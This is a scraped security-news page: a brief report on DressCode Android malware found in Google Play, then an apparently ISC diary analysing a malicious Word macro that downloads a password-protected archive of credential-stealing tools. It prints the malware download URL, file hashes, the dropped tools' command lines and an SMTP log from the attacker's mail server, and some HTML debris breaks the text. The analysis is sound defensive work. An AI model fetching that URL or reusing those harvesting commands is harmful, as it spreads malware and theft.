Information Security News |
by Dan Goodin
Enlarge (credit: Curious Expeditions)
Google Play was recently found to be hosting more than 400 apps that turned infected phones into listening posts that could siphon sensitive data out of the protected networks they connected to, security researchers said Thursday.
One malicious app infected with the so-called DressCode malware had been downloaded from 100,000 to 500,000 times before it was removed from the Google-hosted marketplace, Trend Micro researchers said in a post. Known as Mod GTA 5 for Minecraft PE, it was disguised as a benign game, but included in the code was a component that established a persistent connection with an attacker controlled server. The server then had the ability to bypass so-called network address translation protections that shield individual devices inside a network. Trend Micro has found 3,000 such apps in all, 400 of which were available through Play.
"This malware allows threat actors to infiltrate a user's network environment," Thursday's report stated. "If an infected device connects to an enterprise network, the attacker can either bypass the NAT device to attack the internal server or download sensitive data using the infected device as a springboard."
Read 5 remaining paragraphs | Comments
Every day, we are spammed with thousands of malicious emails and attackers always try to find new ways to bypass the security controls. Yesterday, I detected a suspicious HTTP GET request:
GET /ork/install.zip?fid=484703180 HTTP/1.1User-Agent: http://offensivereports.xyz/ork/install.zip?fid=48473180Host: offensivereports.xyz
Just by reading the User-Agent string, you already know that this is something weird and it must be investigated. I downloaded the file whichwas indeed a ZIP archive and not a disguised PE file. But this time, the archive is protected with a password! The file MD5 is 55d620a29afc46de0a5cb2bebfd7968b and is reported as non-malicious by VT (normal: the files can"> $ unzip -l install.zipArchive: install.zip Length Date Time Name -------- ---- ---- ---- 439608 09-14-15 12:44 msvcp140.dll 348160 04-28-16 09:15 msvcr71.dll 676036 04-28-16 09:15 sqlite3.7.11.dll 196608 04-28-16 09:15 ssleay32.dll 488467 09-25-16 10:17 upd.exe 88248 06-23-15 15:00 vcruntime140.dll 57 09-22-16 22:19 x.Cmd 466432 09-16-16 08:10 em.exe 418304 09-16-16 08:31 fb.exe 439808 09-26-16 12:27 ie.exe 1011712 04-28-16 09:15 libeay32.dll 2533907 09-26-16 13:55 msupd.exe -------- ------- 7107347 12 files
More checks in my log files revealed that the HTTP GET originated from a malicious Word document (MD5: 9f2264c60115cc6d1dd69a4348a26fb2 - unknown on VirusTotal). Let" />
The document contains hidden data (a white font on a white background) which looks like Base64/XOR" />
The macro was pretty well obfuscated to evade the classic antivirus solution but a quick manual analysis of the macro revealed that the hidden data are extracted and the decrypted data aredumped in a file"> +------------+---------------+-----------------------------------------+| Type | Keyword | Description |+------------+---------------+-----------------------------------------+| AutoExec | AutoOpen | Runs when the Word document is opened || AutoExec | Workbook_Open | Runs when the Excel Workbook is opened || Suspicious | Open | May open a file || Suspicious | Shell | May run an executable file or a system || | | command || Suspicious | MkDir | May create a directory || Suspicious | Binary | May read or write a binary file (if || | | combined with Open) || Suspicious | CreateObject | May create an OLE object || Suspicious | Chr | May attempt to obfuscate specific || | | strings || Suspicious | Xor | May attempt to obfuscate specific || | | strings || Suspicious | Environ | May read system environment variables || Suspicious | Put | May write to a file (if combined with || | | Open) |+------------+---------------+-----------------------------------------+
The created file xx.cmd is a PE file (MD5:9b8af9042b8f357e17e6609aa5d0dc7d) also unknown on VT. The file is executed by the macro using a Shell() command. It performs the following actions:
The next step was to get the files from the ZIP archive. The .cmd PE file was not obfuscated and contained a lot of strings. I created a dictionary based on those strings and started a dictionary attack against the archive, no success. Let"> $ md5sum *MD5 (em.exe) = bae5851b1ea539b16800f5bdaded3a68MD5 (fb.exe) = 38ff837f504f63e04491682e96447cdbMD5 (ie.exe) = a8107e664bfbee36653bcdcff37afa00MD5 (libeay32.dll) = 177bda0c92482dfa2c162a3750932b9cMD5 (msupd.exe) = 8e402be9c03d288a5aee9565143632bcMD5 (msvcp140.dll) = 1d8c79f293ca86e8857149fb4efe4452MD5 (msvcr71.dll) = 86f1895ae8c5e8b17d99ece768a70732MD5 (sqlite3.7.11.dll) = f45ed79fee632e407831fbebc51fc063MD5 (ssleay32.dll) = 5023f4c4aaaa1b6e9d992d6bbdcd340bMD5 (upd.exe) = 6c66d7c6a3718d515370709a9f06f4a6MD5 (vcruntime140.dll) = c2bbcb5aae069c22711d8e49d6107401MD5 (x.Cmd) = f97253ff3c80b94fa2efb9e5ab1808db
Only the file em.exe is reported as malicious byVT[1]. The msupd.exe file as an original name setup.exe"> C:\ProgramData\ie.exe -f C:\ProgramData\bigchunk\ie.txtC:\ProgramData\em.exe, -f C:\ProgramData\bigchunk\em.txtC:\ProgramData\fb.exe -f C:\ProgramData\bigchunk\fb.txt
Those files">
220 s37.linuxpl.com ESMTP ServerEHLO SystemIT250-s37.linuxpl.com Hello xxxxxxxx [x.x.x.x]250-SIZE 104857600250-8BITMIME250-PIPELINING250-AUTH PLAIN LOGIN250-STARTTLS250 HELPAUTH PLAIN xxxxxxxxxxx235 Authentication succeededAUTH LOGIN503 already authenticatedMAIL FROM:
Now I have the attackers email address and credentials to use his mail server!
Sadly, the attack was not completely successful in my sandbox environment and no data was ex-filtrated (collected credentials). I did not detectany traffic to the Wild Internet... As you can see, attackers are always trying to find ways to bypass security controls like password protected archives, generic Microsoft tools).
Stay safe!
[1]https://www.virustotal.com/en/file/2e149eae2956d2d749110f803044ff8b252dcbaf3ae09bdcf30a58b74bbd7329/analysis/
[2]https://www.microsoft.com/en-us/download/details.aspx?id=24556
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key